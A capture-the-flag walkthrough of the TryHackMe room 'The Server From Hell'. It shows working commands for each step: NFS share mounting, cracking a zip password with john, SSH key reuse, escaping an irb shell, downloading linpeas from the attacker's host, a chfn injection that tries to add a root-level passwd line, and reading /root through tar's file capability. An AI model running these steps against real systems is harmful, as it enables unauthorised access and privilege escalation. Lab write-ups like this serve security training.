TryHackMe: theserverfromhell
TryHackMe: The Server From Hell https://tryhackme.com/room/theserverfromhell
Enum
Lets kick off with the usual scan, this time lets try rustscan
rustscan 10.10.102.177 --ulimit 5000 -- -sC -sV -oA hell -vvv hell -A
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
Faster Nmap scanning with Rust.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
πHACK THE PLANETπ
[~] The config file is expected to be at "/home/tj/.config/rustscan/config.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.102.177:23436
Open 10.10.102.177:301
Open 10.10.102.177:2808
Open 10.10.102.177:24670
Open 10.10.102.177:4081
Open 10.10.102.177:16928
Open 10.10.102.177:197
Open 10.10.102.177:9212
Open 10.10.102.177:10472
Open 10.10.102.177:9186
Open 10.10.102.177:23319
Open 10.10.102.177:184
Open 10.10.102.177:22033
Open 10.10.102.177:171
Open 10.10.102.177:29710
Open 10.10.102.177:10446
Open 10.10.102.177:11732
Open 10.10.102.177:21981
Open 10.10.102.177:28398
Open 10.10.102.177:119
Open 10.10.102.177:3964
Open 10.10.102.177:18097
Open 10.10.102.177:14239
Open 10.10.102.177:24514
Open 10.10.102.177:27086
Open 10.10.102.177:5224
Open 10.10.102.177:80
Open 10.10.102.177:11641
Open 10.10.102.177:29632
Open 10.10.102.177:14200
Open 10.10.102.177:27047
Open 10.10.102.177:9056
Open 10.10.102.177:7770
Open 10.10.102.177:5198
Open 10.10.102.177:12901
Open 10.10.102.177:9043
Open 10.10.102.177:2613
Open 10.10.102.177:20591
Open 10.10.102.177:6445
Open 10.10.102.177:2587
Open 10.10.102.177:26982
Open 10.10.102.177:19253
Open 10.10.102.177:7692
Open 10.10.102.177:15395
Open 10.10.102.177:26956
Open 10.10.102.177:29515
Open 10.10.102.177:28203
Open 10.10.102.177:26917
Open 10.10.102.177:14057
Open 10.10.102.177:12771
Open 10.10.102.177:16616
Open 10.10.102.177:12719
Open 10.10.102.177:20383
Open 10.10.102.177:1106
Open 10.10.102.177:13953
Open 10.10.102.177:11381
Open 10.10.102.177:7523
Open 10.10.102.177:22942
Open 10.10.102.177:7510
Open 10.10.102.177:17785
Open 10.10.102.177:13940
Open 10.10.102.177:25488
Open 10.10.102.177:11342
Open 10.10.102.177:6211
Open 10.10.102.177:7484
Open 10.10.102.177:25462
Open 10.10.102.177:20318
Open 10.10.102.177:26735
Open 10.10.102.177:6172
Open 10.10.102.177:1028
Open 10.10.102.177:1015
Open 10.10.102.177:17707
Open 10.10.102.177:15122
Open 10.10.102.177:11264
Open 10.10.102.177:24111
Open 10.10.102.177:976
Open 10.10.102.177:2262
Open 10.10.102.177:20240
Open 10.10.102.177:2249
Open 10.10.102.177:29216
Open 10.10.102.177:21500
Open 10.10.102.177:6068
....
....
....
....
IT JUST KEEPS GOING .............
Find the troll face
WTF, ok enumerating the ports was useless so as the room says lets start by trying port 1337
with telnet
$ telnet hell 1337
Trying 10.10.102.177...
Connected to hell.
Escape character is '^]'.
Welcome traveller, to the beginning of your journey
To begin, find the trollface
Legend says he's hiding in the first 100 ports
Try printing the banners from the portsConnection closed by foreign host.
Ok, so we need to find troll face..... lets write a one liner
for i in {1..100}; do (sleep 1; echo "get /") | telnet hell $i | grep 550 >> x ; done
Now when we tail
x or look at it after completion ....
550 12345 0000000000000000000000000000000000000000000000000000000
550 12345 0000000000000000000000000000000000000000000000000000000
550 12345 0ffffffffffffffffffffffffffffffffffffffffffffffffffff00
550 12345 0fffffffffffff777778887777777777cffffffffffffffffffff00
550 12345 0fffffffffff8000000000000000008888887cfcfffffffffffff00
550 12345 0ffffffffff80000088808000000888800000008887ffffffffff00
550 12345 0fffffffff70000088800888800088888800008800007ffffffff00
550 12345 0fffffffff000088808880000000000000088800000008fffffff00
550 12345 0ffffffff80008808880000000880000008880088800008ffffff00
550 12345 0ffffffff000000888000000000800000080000008800007fffff00
550 12345 0fffffff8000000000008888000000000080000000000007fffff00
550 12345 0ffffff70000000008cffffffc0000000080000000000008fffff00
550 12345 0ffffff8000000008ffffff007f8000000007cf7c80000007ffff00
550 12345 0fffff7880000780f7cffff7800f8000008fffffff80808807fff00
550 12345 0fff78000878000077800887fc8f80007fffc7778800000880cff00
550 12345 0ff70008fc77f7000000f80008f8000007f0000000000000888ff00
550 12345 0ff0008f00008ffc787f70000000000008f000000087fff8088cf00
550 12345 0f7000f800770008777 [REDACTED] 80008f7f700880cf00
550 12345 0f8008c008fff8000000000000780000007f800087708000800ff00
550 12345 0f8008707ff07ff8000008088ff800000000f7000000f800808ff00
550 12345 0f7000f888f8007ff7800000770877800000cf780000ff00807ff00
550 12345 0ff0808800cf0000ffff70000f877f70000c70008008ff8088fff00
550 12345 0ff70800008ff800f007fff70880000087f70000007fcf7007fff00
550 12345 0fff70000007fffcf700008ffc778000078000087ff87f700ffff00
550 12345 0ffffc000000f80fff700007787cfffc7787fffff0788f708ffff00
550 12345 0fffff7000008f00fffff78f800008f887ff880770778f708ffff00
550 12345 0ffffff8000007f0780cffff700000c000870008f07fff707ffff00
550 12345 0ffffcf7000000cfc00008fffff777f7777f777fffffff707ffff00
550 12345 0cccccff0000000ff000008c8cffffffffffffffffffff807ffff00
550 12345 0fffffff70000000ff8000c700087fffffffffffffffcf808ffff00
550 12345 0ffffffff800000007f708f000000c0888ff78f78f777c008ffff00
550 12345 0fffffffff800000008fff7000008f0000f808f0870cf7008ffff00
550 12345 0ffffffffff7088808008fff80008f0008c00770f78ff0008ffff00
550 12345 0fffffffffffc8088888008cffffff7887f87ffffff800000ffff00
550 12345 0fffffffffffffffff70008878800000000000008878008007fff00
550 12345 0fffffffffffffffffff700008888800000000088000080007fff00
550 12345 0fffffffffffffffffffffc800000000000000000088800007fff00
550 12345 0fffffffffffffffffffffff7800000000000008888000008ffff00
550 12345 0fffffffffffffffffffffffff7878000000000000000000cffff00
550 12345 0ffffffffffffffffffffffffffffffc880000000000008ffffff00
550 12345 0ffffffffffffffffffffffffffffffffff7788888887ffffffff00
550 12345 0ffffffffffffffffffffffffffffffffffffffffffffffffffff00
550 12345 0000000000000000000000000000000000000000000000000000000
550 12345 0000000000000000000000000000000000000000000000000000000
550 12345 0000000000000000000000000000000000000000000000000000000
So we are told go to port [REDACTED]
....
Port [REDACTED]
Telneting to port [REDACTED]
we get
$ telnet hell [REDACTED]
Trying 10.10.102.177...
Connected to hell.
Escape character is '^]'.
NFS shares are cool, especially when they are misconfigured
It's on the standard port, no need for another scanConnection closed by foreign host.
So this is point us to NFS, lets take a look......
$ showmount -e hell
Export list for hell:
/home/nfs *
NFS
Ok lets mount the nfs share and have a look inside
$ sudo mount -tnfs hell:/home/nfs nfs
tj@kali:~/pentest/ctfs/hell$ ls nfs/
backup.zip
Ok lets have a look of the contents of the zip file
$ unzip -l nfs/backup.zip
Archive: nfs/backup.zip
Length Date Time Name
--------- ---------- ----- ----
0 2020-09-15 23:11 home/hades/.ssh/
3369 2020-09-15 23:11 home/hades/.ssh/id_rsa
10 2020-09-15 23:11 home/hades/.ssh/hint.txt
736 2020-09-15 23:11 home/hades/.ssh/authorized_keys
33 2020-09-15 23:11 home/hades/.ssh/flag.txt
736 2020-09-15 23:11 home/hades/.ssh/id_rsa.pub
--------- -------
4884 6 files
This looks like out first flag.txt
as well as some ssh keys..... lets etxract and get the flag
$ mkdir backup-zip
$ cd backup-zip/
$ unzip ../nfs/backup.zip
Archive: ../nfs/backup.zip
creating: home/hades/.ssh/
[../nfs/backup.zip] home/hades/.ssh/id_rsa password:
skipping: home/hades/.ssh/id_rsa incorrect password
skipping: home/hades/.ssh/hint.txt incorrect password
skipping: home/hades/.ssh/authorized_keys incorrect password
skipping: home/hades/.ssh/flag.txt incorrect password
skipping: home/hades/.ssh/id_rsa.pub incorrect password
F@&K, never easy and so we need a password for archive, let break out john
and rockyou.txt
$ sudo zip2john ../nfs/backup.zip
backup.zip/home/hades/.ssh/ is not encrypted!
ver 1.0 ../nfs/backup.zip/home/hades/.ssh/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 backup.zip/home/hades/.ssh/id_rsa PKZIP Encr: 2b chk, TS_chk, cmplen=2107, decmplen=3369, crc=6F72D66B
ver 1.0 efh 5455 efh 7875 backup.zip/home/hades/.ssh/hint.txt PKZIP Encr: 2b chk, TS_chk, cmplen=22, decmplen=10, crc=F51A7381
ver 2.0 efh 5455 efh 7875 backup.zip/home/hades/.ssh/authorized_keys PKZIP Encr: 2b chk, TS_chk, cmplen=602, decmplen=736, crc=1C4C509B
ver 1.0 efh 5455 efh 7875 backup.zip/home/hades/.ssh/flag.txt PKZIP Encr: 2b chk, TS_chk, cmplen=45, decmplen=33, crc=2F9682FA
ver 2.0 efh 5455 efh 7875 backup.zip/home/hades/.ssh/id_rsa.pub PKZIP Encr: 2b chk, TS_chk, cmplen=602, decmplen=736, crc=1C4C509B
backup.zip:$pkzip2$3*2*1*0*8*24*1c4c*b16d*7d8849d53ca2d690df91b5f8ff302e0eae9c13c7fbb169b6d935abdfef8c00e339f84c09*1*0*8*24*6f72*b16d*7168a30d9a64dc6df0956c675b62ff980dbd4f16fe022b1abb1c75e1943c97e47bbdc5f5*2*0*16*a*f51a7381*8e5*52*0*16*f51a*b16d*5050fa8c08f92051a2cad9941e8a8f4522a8c5dbfa32*$/pkzip2$::backup.zip:home/hades/.ssh/hint.txt, home/hades/.ssh/authorized_keys, home/hades/.ssh/id_rsa:../nfs/backup.zip
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
Ok lets put the hash into zip.hash
and try to crack it
$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt zip.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
[REDACTED] (backup.zip)
1g 0:00:00:00 DONE (2020-11-01 23:40) 20.00g/s 163840p/s 163840c/s 163840C/s 123456..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed
OK we have the password os lets extract
$ unzip ../nfs/backup.zip
Archive: ../nfs/backup.zip
[../nfs/backup.zip] home/hades/.ssh/id_rsa password:
inflating: home/hades/.ssh/id_rsa
extracting: home/hades/.ssh/hint.txt
inflating: home/hades/.ssh/authorized_keys
extracting: home/hades/.ssh/flag.txt
inflating: home/hades/.ssh/id_rsa.pub
So first flag is
cat flag.txt
[REDACTED]
SSH'in
Ok so first we need a user, lets assume that the user in the public key will be the user on the box
$ cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC++lgUyjrUH1b6Hm5ZR2j6OqP1GMWJpDgm8Z4sj0q2XxoFnE+eA3J3lUMUSyUV+BthSFiA2ZTbFNpY8rQfB67Jq4iLNXhAsD0oS9UwDP7ZbzKFxKtQOlTR+iyiUYflOZDEFL01P+bPBKOyTB6gxsLP2YpD1mXj1GaoaDylkjcWhpLBPAPz7KwSgXVEpM2LoAE0Yer/TSpp2Ywu0zYqAV0k2LpLp9WOnDC+VWEK9x2pigeOnNf3g+hCnOpiVuLmGq89Ub9WPt5YEMfMvqRqnHfYixI1+pPusV835q0w/f+h8kSiOeAFviC8SgBne3MHTwR7png5O2VsUDzzjStBc5PDFcCp28V07beTe4Ftf8QwNXX1mQHPf5H8kaWvJYJ/hsIGbBLE1m5+LVpCaogxWaycGrQMo9iqr2POIepSoW9kzEdHVWMJgCerzdUqkOgj0mX0qC8rMc5m2uJCpPL0wzr+l6E0ZQggKXdETDi/kKrQcM8dVzmR8vfu2ndXFxfkLnOjEiLqMqRK9caNF+1wr2kZ0tEKS1xamh4VfG+8JdPVsCu6DPvQt9o/c16otOzRxqBGR3ao4UfL9kscyCrC26EcTRp1P4JEuTmm4ZDTXQvgU4TSKLmIl9h6eBWrLhgey0pAmKCD+N/87lT4unwciGh1JvTc+6nosT1wX9mzfGvktQ== hades@hell
so we are going to be trying ssh as hades
$ ssh -i id_rsa hades@hell
kex_exchange_identification: read: Connection reset by peer
Connection reset by 10.10.102.177 port 22
bugger, ssh is not on port 22! Lets have a look at hints.txt
$ cat hint.txt
2500-4500
Ok that is a large port range but lets try it, kicked off 2 for loops
for i in {2500..4500}; do ssh -i id_rsa hades@hell -p $i ; done
for i in {4500..1500}; do ssh -i id_rsa hades@hell -p $i ; done
and to hedge my bets a random port tester
while true ; do ssh -i id_rsa hades@hell -p `shuf -i 2500-4500 -n 1` ; done
Eventually I found the port
The authenticity of host '[hell]:[REDACTED] ([10.10.102.177]:[REDACTED])' can't be established.
ECDSA key fingerprint is SHA256:xT5f2qKwN5vWrUVIEkkL92j1vcb/XjF9tIHoW/vyyx8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[hell]:[REDACTED],[10.10.102.177]:[REDACTED]' (ECDSA) to the list of known hosts.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
βββ ββ ββββββ βββ βββ
ββββ βββββ β ββββ ββββ
ββββββββββββ ββββ ββββ
βββ βββ βββ β ββββ ββββ
βββββββββββββββββββββββββββββββ
β βββββββ ββ ββ βββ ββ βββ β
β βββ β β β ββ β β ββ β β β
β ββ β β β β β β
β β β β β β β β β
Welcome to hell. We hope you enjoy your stay!
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
βββ ββ ββββββ βββ βββ
ββββ βββββ β ββββ ββββ
ββββββββββββ ββββ ββββ
βββ βββ βββ β ββββ ββββ
βββββββββββββββββββββββββββββββ
β βββββββ ββ ββ βββ ββ βββ β
β βββ β β β ββ β β ββ β β β
β ββ β β β β β β
β β β β β β β β β
Welcome to hell. We hope you enjoy your stay!
irb(main):001:0>
We are in but wtf is irb
or have we just fallen into a honey pot ? [tab][tab]
shows a list of files but help, ls etc do not bring anything useful back
irb(main):006:0>
.bash_logout .bashrc .profile .ssh/ user.txt
irb(main):006:0> help
Enter the method name you want to look up.
You can use tab to autocomplete.
Enter a blank line to exit.
>>
and scp
nor sftp
seem to work....
$ scp -i id_rsa -P3333 hades@hell:user.txt .
/usr/lib/ruby/2.5.0/irb/init.rb:210:in `parse_opts': Unrecognized switch: -c (IRB::UnrecognizedSwitch)
from /usr/lib/ruby/2.5.0/irb/init.rb:19:in `setup'
from /usr/lib/ruby/2.5.0/irb.rb:376:in `start'
from /usr/bin/irb:11:in `<main>'
$ sftp -i id_rsa -P3333 hades@hell:user.txt .
Connection closed.
Connection closed
Googling reveals irb
to be a ruby interactive shell
. Bit of looking and googlefu reveals system
can be used.
irb(main):007:0> system "cat user.txt"
[REDACTED]
=> true
Boom, user flag, so lets try for root
Root flag
lets get a shell we can use
irb(main):008:0> system "/bin/bash"
sudo
requires hades password, we do not have it so lets move along. Let get good old linpeas.sh
on the box, we do not have permission to write to /home/hades so lets write to /tmp
hades@hell:~$ wget http://10.9.5.198:8000/linpeas.sh -O linpeas.sh
linpeas.sh: Permission denied
hades@hell:~$ wget http://10.9.5.198:8000/linpeas.sh -O /tmp/linpeas.sh
--2020-11-02 00:24:15-- http://10.9.5.198:8000/linpeas.sh
Connecting to 10.9.5.198:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 223835 (219K) [text/x-sh]
Saving to: β/tmp/linpeas.shβ
/tmp/linpeas.sh 100%[====================================================>] 218.59K 1.41MB/s in 0.2s
2020-11-02 00:24:15 (1.41 MB/s) - β/tmp/linpeas.shβ saved [223835/223835]
hades@hell:~$ sh /tmp/linpeas.sh
OK looking at the output we have the interesting bits
[+] Users with console
root:x:0:0:root:/root:/bin/bash
ubuntu:x:1001:1001:Ubuntu:/home/ubuntu:/bin/bash
vagrant:x:1000:1000:,,,:/home/vagrant:/bin/bash
====================================( Interesting Files )=====================================
[+] SUID - Check easy privesc, exploits and write perms
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands
/usr/lib/snapd/snap-confine
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/bin/chfn ---> SuSE_9.3/10
/usr/bin/sudo ---> /sudo$
/usr/bin/gpasswd
/usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
/usr/bin/newuidmap
/usr/bin/chsh
/usr/bin/traceroute6.iputils
/usr/bin/newgidmap
/usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
/usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
/usr/bin/newgrp ---> HP-UX_10.20
/sbin/mount.nfs
/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
/bin/su
/bin/umount ---> BSD/Linux(08-1996)
/bin/fusermount
/bin/ping
[+] SGID
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands
/usr/lib/x86_64-linux-gnu/utempter/utempter
/usr/bin/mlocate
/usr/bin/expiry
/usr/bin/bsd-write
/usr/bin/chage
/usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
/usr/bin/crontab
/usr/bin/ssh-agent
/usr/bin/wall
/sbin/unix_chkpwd
/sbin/pam_extrausers_chkpwd
[+] Capabilities
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities
/usr/bin/mtr-packet = cap_net_raw+ep
/bin/tar = cap_dac_read_search+ep
Looking at 'chfn' we need hades
password.....
$ export SHELL=/bin/bash; chfn -h "`echo -e ':/:'$SHELL'\nr00t::0:0:'`" $USER > /dev/null
Password:
chfn: PAM: Authentication failure
None of the normal SUID or SGID suspects work so lets take a look at tar
in capabilities which looks out of place.
Looking through https://nxnjz.net/2018/08/an-interesting-privilege-escalation-vector-getcap/ we should just be able to use tar
to get the root flag
hades@hell:~$ cd /tmp
hades@hell:/tmp$ tar -cvf root.tar /root
tar: Removing leading `/' from member names
/root/
/root/.gnupg/
/root/.gnupg/private-keys-v1.d/
/root/.bashrc
/root/root.txt
/root/.bash_history
/root/.ssh/
/root/.ssh/authorized_keys
/root/.cache/
/root/.cache/motd.legal-displayed
/root/.profile
Lets extract it
hades@hell:/tmp$ tar xvf root.tar
root/
root/.gnupg/
root/.gnupg/private-keys-v1.d/
root/.bashrc
root/root.txt
root/.bash_history
root/.ssh/
root/.ssh/authorized_keys
root/.cache/
root/.cache/motd.legal-displayed
root/.profile
Lets get the flag
hades@hell:/tmp/root$ cat root.txt
[REDACTED]
BOOM We have navigated the 9 layers of hell and come out with the flags!!!!!